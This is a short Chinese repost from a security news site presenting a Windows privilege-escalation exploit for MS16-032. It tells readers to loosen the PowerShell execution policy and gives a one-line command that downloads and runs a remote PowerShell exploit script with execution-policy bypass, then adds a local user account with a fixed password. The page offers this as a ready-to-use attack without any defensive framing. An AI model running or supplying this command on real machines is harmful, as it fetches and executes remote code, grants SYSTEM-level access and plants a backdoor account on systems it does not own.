MS16-032 windows提权exp 通杀高版本

2021年8月31日08:37:19评论278 views字数 471阅读1分34秒阅读模式

漏洞利用代码:http://www.liaowei.net

可能会遇到问题无法加载文件 ******.ps1，因为在此系统中禁止执行脚本。
执行
set-executionpolicy remotesigned
选择Y即可。
支持机器Win7-Win10 & 2k8-2k12
测试于 x32 Win7, x64 Win8, x64 2k12R2

远程加用户：
直接执行如下命令，可进行提权并添加用户：
powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1’);Invoke-MS16-032 -Application cmd.exe -commandline ‘/c net user test test123 /add'”

本文始发于微信公众号（飓风网络安全）：MS16-032 windows提权exp 通杀高版本

左青龙
微信扫一扫

右白虎
微信扫一扫

本文由 admin 发表于 2021年8月31日08:37:19
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
MS16-032 windows提权exp 通杀高版本http://cn-sec.com/archives/359420.html

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码

MS16-032 windows提权exp 通杀高版本

若依系统恰分攻略

HW必备技能教学之Windows应急响应常见流程【附应急工具】

技术实践｜大模型内容安全蓝军的道与术

Weblogic SSRF漏洞（CVE-2014-4210）

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

HACKADEMIC: RTB1靶场-复现

卡巴斯基引擎另类免杀玩法

任意文件读取rce记录

信创 | 国产数据库派别分类

应急响应常用命令手册

发表评论

在线咨询

微信